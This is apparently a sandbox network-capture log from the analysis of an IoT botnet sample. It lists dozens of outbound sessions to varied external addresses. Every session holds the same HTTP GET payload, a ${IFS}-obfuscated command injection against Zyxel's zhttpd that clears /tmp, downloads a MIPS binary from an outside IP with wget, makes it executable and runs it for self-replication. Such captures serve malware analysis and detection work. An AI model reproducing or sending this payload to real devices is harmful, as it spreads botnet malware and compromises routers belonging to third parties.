                                      Jan 14, 2024 15:50:58.577208996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7399192.168.2.144519088.79.35.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577261925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7400192.168.2.1441700177.117.210.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577316046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7401192.168.2.1452472167.135.248.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577353954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7402192.168.2.1435872113.158.74.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577383041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7403192.168.2.1442586196.94.11.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577433109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7404192.168.2.143277648.20.64.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577461958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7405192.168.2.1453734169.142.25.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577507973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7406192.168.2.143418813.168.195.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577562094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7407192.168.2.1434168142.202.204.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577606916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7408192.168.2.1451772142.221.61.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577650070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7409192.168.2.1446970174.68.139.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577685118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7410192.168.2.1437174199.222.118.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577717066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7411192.168.2.143542294.37.18.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577781916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7412192.168.2.144743250.34.150.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577806950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7413192.168.2.1432788216.234.96.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577863932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7414192.168.2.143928676.94.188.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577914953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7415192.168.2.1453262204.32.32.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577941895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7416192.168.2.1438264216.220.237.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577976942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7417192.168.2.1458638178.249.17.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578037977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7418192.168.2.1451722111.135.171.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578073978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7419192.168.2.145753883.60.95.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578113079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7420192.168.2.1453958186.97.101.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578169107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7421192.168.2.1453066129.246.73.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578192949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7422192.168.2.1441636151.143.180.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578217983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7423192.168.2.1453458192.118.106.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578286886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7424192.168.2.1442190126.48.6.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578324080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7425192.168.2.143937624.223.138.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578382969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7426192.168.2.145628457.126.69.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578428030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7427192.168.2.1452666178.24.138.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578480005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7428192.168.2.1444572171.167.130.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578514099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7429192.168.2.1433126153.156.167.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578563929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7430192.168.2.143481087.144.39.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578603983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7431192.168.2.14473969.77.131.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578639984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7432192.168.2.1446424154.73.181.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578684092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7433192.168.2.1434054112.236.133.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578716993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7434192.168.2.145008645.196.147.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578764915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7435192.168.2.145553024.57.137.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578809023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7436192.168.2.1452790206.184.33.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578833103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7437192.168.2.144653427.171.27.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578864098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7438192.168.2.143959241.101.8.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578890085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7439192.168.2.1460108161.73.195.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578912020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7440192.168.2.1456264133.189.102.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578953981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7441192.168.2.1433362114.14.12.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.578999043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7442192.168.2.1455844207.132.198.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579049110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7443192.168.2.14333329.209.153.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579113960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7444192.168.2.145833636.241.15.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579163074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7445192.168.2.143371047.24.77.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579201937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7446192.168.2.145849260.131.66.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579252005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7447192.168.2.1452776134.253.68.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579282999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7448192.168.2.1432956123.117.73.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579335928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7449192.168.2.144038884.27.53.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579370022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7450192.168.2.1457172197.97.254.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579422951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7451192.168.2.145316854.0.73.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579447985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7452192.168.2.1433906114.243.198.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579504967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7453192.168.2.1459262137.163.17.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579552889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7454192.168.2.1442690125.130.114.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579610109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7455192.168.2.145287218.114.164.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579654932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7456192.168.2.1445578207.104.110.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579701900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7457192.168.2.145815242.15.217.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579740047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7458192.168.2.1444204184.41.251.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579786062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7459192.168.2.144930073.85.194.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579818964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7460192.168.2.14559569.231.194.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579854012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7461192.168.2.146018417.33.14.163443
                                      TimestampBytes transferredDirectionData
